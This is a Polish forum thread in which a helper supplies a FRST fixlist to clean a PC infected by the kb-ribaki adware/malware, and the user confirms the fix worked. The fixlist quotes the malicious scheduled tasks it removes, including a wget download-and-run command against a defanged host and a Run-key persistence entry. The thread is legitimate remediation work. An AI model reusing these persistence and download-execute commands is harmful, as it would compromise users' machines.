Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

[Rozwiązano] Logi z FRST - proszę o interpretację odnośnie kb ribaki

bagnica 19 Lut 2018 00:25 261 2
  • #2 19 Lut 2018 08:00
    krzychupar
    Poziom 40  

    Otwórz notatnik systemowy i wklej:

    ContextMenuHandlers4: [WinRAR] -> _{B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> Brak pliku
    Task: {245FE3E2-0F77-4327-9AD0-EE567CF250FA} - System32\Tasks\{A0A9C16D-9597-471B-AC92-C2380C2AB84C} => C:\Windows\system32\pcalua.exe -a E:\directx\dxsetup.exe -d E:\directx
    Task: {2F57269B-1E09-4E2D-AB1E-B0FDAC7D279C} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> Brak pliku <==== UWAGA
    Task: {4B38DA02-AD61-4A2B-B404-079B32853C59} - System32\Tasks\{8515C219-AF73-4F91-99C2-17CD9415A093} => F:\Autorun.exe
    Task: {4D77BD92-6B08-434A-9D9C-C5192A6AEBDA} - System32\Tasks\Ja => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Ja /t REG_SZ /d "explorer.exe hxxp://kb-ribaki.org" <==== UWAGA
    Task: {52908C21-FA32-416A-9727-26981E2BEBF2} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> Brak pliku <==== UWAGA
    Task: {9BE8D56A-8BAD-4BAB-91B5-5C389B6C4637} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grogle.in/dat.bmp?data=u4OMKFT23E;camtasia.exe;1446311684 & start cmd /R dat.bmp <==== UWAGA
    Task: {9FC6D1EA-F58F-43D7-8D1C-C4308696321A} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> Brak pliku <==== UWAGA
    Task: {AC4E5ACF-89F7-4220-BA21-81EE183975E2} - \Microsoft\Windows\Application Experience\AitAgent -> Brak pliku <==== UWAGA
    Task: {CEE64558-E1A7-4D9D-80A7-2001912BE5B5} - \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector -> Brak pliku <==== UWAGA
    Task: {FA2BC0A6-8D4B-458A-85C8-2B8C72487513} - \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector -> Brak pliku <==== UWAGA
    Hosts:
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
    HKU\S-1-5-21-101499847-300400899-1846284165-1000\...\Run: [Ja] => explorer.exe hxxp://kb-ribaki.org <==== UWAGA
    HKU\S-1-5-21-101499847-300400899-1846284165-1000\...\MountPoints2: E - E:\Autorun.exe
    HKU\S-1-5-21-101499847-300400899-1846284165-1000\...\MountPoints2: {1577f15a-3fd6-11e3-8af7-1c6f6559f9be} - F:\autorun.exe
    GroupPolicy: Ograniczenia <==== UWAGA
    Tcpip\..\Interfaces\{11819213-699E-486E-902F-1608347CA3BA}: [DhcpNameServer] 172.20.10.1
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =




    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
    SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    Toolbar: HKLM - Brak nazwy - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - Brak pliku
    FF HKU\S-1-5-21-101499847-300400899-1846284165-1000\...\Firefox\Extensions: [acewebextension_unlisted@acestream.org] - C:\Users\Ja\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi => nie znaleziono
    FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [Brak pliku]
    FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [Brak pliku]
    FF Plugin HKU\S-1-5-21-101499847-300400899-1846284165-1000: @acestream.net/acestreamplugin,version=3.1.16.1 -> C:\Users\Ja\AppData\Roaming\ACEStream\player\npace_plugin.dll [Brak pliku]
    CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-101499847-300400899-1846284165-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjbepbhonbojpoaenhckjocchgfiaofo] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx <nie znaleziono>
    S2 CTDevice_Srv; C:\Program Files (x86)\Creative\Shared Files\CTDevSrv.exe [X]
    S3 CTUPnPSv; C:\Program Files (x86)\Creative\Creative Centrale\CTUPnPSv.exe [X]
    S3 AndNetDiag; system32\DRIVERS\lgandnetdiag64.sys [X]
    S3 ANDNetModem; system32\DRIVERS\lgandnetmodem64.sys [X]
    S3 IntcAzAudAddService; system32\drivers\RTKVHD64.sys [X]
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze, gdzie masz FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.

    0
  • #3 06 Maj 2018 10:18
    bagnica
    Poziom 5  

    Uruchomienie FRST używając powyższego loga wyczyściło kompa na cacy :)

    0